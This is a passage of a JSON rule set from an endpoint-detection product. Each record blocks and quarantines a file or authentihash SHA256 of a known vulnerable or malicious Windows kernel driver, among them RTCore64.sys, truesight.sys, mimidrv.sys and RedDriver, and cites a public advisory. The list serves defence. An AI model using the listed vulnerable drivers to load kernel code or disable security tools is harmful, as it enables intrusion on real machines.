+ "id": "c300dbfb-a7db-5fff-9096-cfc2bdce8cb0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460522Z",
+ "creation_date": "2026-03-23T11:45:30.460525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c181ce9a57e8d763db89ba7c45702a8cf66ef1bb58e3f21874cf0265711f886b",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c307edb6-2ce6-5c6f-a701-a46e214e8348",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481748Z",
+ "creation_date": "2026-03-23T11:45:30.481750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "223f61c3f443c5047d1aeb905b0551005a426f084b7a50384905e7e4ecb761a1",
+ "comment": "Vulnerable Kernel Driver (aka cg6kwin2k.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c31428c3-3159-57dc-bb8a-982f0d64d27d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829149Z",
+ "creation_date": "2026-03-23T11:45:30.829151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829157Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58be5999562f2541e29eb5a0890637a4a1b78df9ba96637475772ce4a67da4d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3237d36-c384-558b-8653-4fda838c57ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979030Z",
+ "creation_date": "2026-03-23T11:45:29.979031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd",
+ "comment": "Vulnerable Kernel Driver (aka driver7-x64.sys) [https://www.loldrivers.io/drivers/48bc2815-85ec-4436-a51a-69810c8cb171/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c33020aa-b4ab-5491-815d-514375805cf9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145372Z",
+ "creation_date": "2026-03-23T11:45:32.145375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1123b59a801e243a64270d0c6ab1277e5e3afba9c19023807409f53c1b0204b",
+ "comment": "Malicious Kernel Driver (aka driver_e1123b59.sys) [https://www.loldrivers.io/drivers/11a73c42-26aa-446b-8560-43eecb265091/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c33a6738-3af8-5162-8bda-a0d4c42f5d74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967986Z",
+ "creation_date": "2026-03-23T11:45:29.967988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13b82d81d6eac1a8b2e4655504dabecbd70673cdf45c244702a02f3397fdff9a",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c33e74d6-bd7d-517f-8a60-b158f141b597",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458222Z",
+ "creation_date": "2026-03-23T11:45:30.458225Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "003e61358878c7e49e18420ee0b4a37b51880be40929a76e529c7b3fb18e81b4",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c34674da-9ffe-5dd6-b627-4a05475a69d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986101Z",
+ "creation_date": "2026-03-23T11:45:29.986103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ce1073705194870175a8b9c9ebbbb7ad54df81849b111588ea8aeef910da987",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3534a7c-5a06-5327-b21d-a3e0bd091c06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159474Z",
+ "creation_date": "2026-03-23T11:45:31.159476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "997cffe72ff84747a895dd9e18c533cc52d3b655071dcbe24e9834368d6adcf3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3595160-9bb3-5eb4-af75-b8e3117b56aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610318Z",
+ "creation_date": "2026-03-23T11:45:29.610319Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610325Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26e3bfef255efd052a84c3c43994c73222b14c95db9a4b1fc2e98f1a5cb26e43",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c35f99ca-4745-544c-8bf7-9d1e46f9e8d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622245Z",
+ "creation_date": "2026-03-23T11:45:29.622247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f67e60228084151fdcb84e94a48693db864cf606b65faef5a1d829175380dbfa",
+ "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c365a593-fabd-5d91-9cc2-af65bf473a2b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831398Z",
+ "creation_date": "2026-03-23T11:45:30.831402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa9c83e8ca1ab46f4670b32fb4f43a3dd76bd1d12f650d3122ec51ce6c80dd03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c384338a-fe77-5c16-9300-aa501bfcddb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484273Z",
+ "creation_date": "2026-03-23T11:45:31.484277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484286Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "caea1a15e28a16bb027e18b3c1e7b809f59d773a1f3be77e2fe97affd375faf2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c389d294-a103-594e-9030-04354aabff1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817995Z",
+ "creation_date": "2026-03-23T11:45:30.817997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818003Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "abb507455dd1e23e91753f17d6d7a8a5d6572e288f25eb75e4cbdd2e60adae88",
+ "comment": "Vulnerable Kernel Driver (aka sepdrv3_1.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c38c975e-3947-5476-9f8b-f0a7454cc623",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147003Z",
+ "creation_date": "2026-03-23T11:45:32.147006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e9f3f58005d62b241874e9790d457d0fbffc101062166f70a5c27aceefdde36",
+ "comment": "Vulnerable Kernel Driver (aka TPwSav.sys) [https://www.loldrivers.io/drivers/c0634ed7-840e-4a7e-8b34-33efe50405c2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3969cf0-436e-58a0-8600-b77544e7aba3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822308Z",
+ "creation_date": "2026-03-23T11:45:31.822311Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "181d4651f614e8ae094c77a43785ec9a4627b53d75350ee25ba22bd4d4fba3c9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c39fcac6-ea6d-586a-9968-e2f798685115",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151020Z",
+ "creation_date": "2026-03-23T11:45:31.151022Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151027Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c5beec296982c6f5ca83adfc9c5f9bc5af81a32abef8b8a15d2df7e21058020",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3afbb13-97fe-508d-8996-6028b6d7f653",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828902Z",
+ "creation_date": "2026-03-23T11:45:31.828904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828909Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3634f9f7ab91b99004b42da85f26fe2b19ad7692a0a49068869a9ece332a3f0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3bd6b2e-1d3a-521a-a478-c47e36ea54b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468199Z",
+ "creation_date": "2026-03-23T11:45:30.468202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4d7e16649ce3c7ad9355e8d7418a4c234b3763e262f8ccfbda4bc64a402ed27",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3bd97a6-a966-5251-b946-e5fbe8c741dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814012Z",
+ "creation_date": "2026-03-23T11:45:31.814016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ce251a2b592afefdcae1a9a6458eea982cb84c79fbd7a23d60735e8e2f7cc53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3bdb0b3-0b6f-5dae-a2c8-58aae4d53529",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143986Z",
+ "creation_date": "2026-03-23T11:45:31.143988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f118e7bd5e3ae74fcd7fdcb71777e30935196495a09bddf01d8f4cc1c0ee5dd3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3bf4a8d-4187-540d-b69e-34b8d46c7367",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834437Z",
+ "creation_date": "2026-03-23T11:45:30.834440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834448Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9f231567cd2ce00d26989d543e91cb869e8b8cf6c215b94cb917f93820c3138",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3c24a91-c114-5993-9d6d-02165bdfefe3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
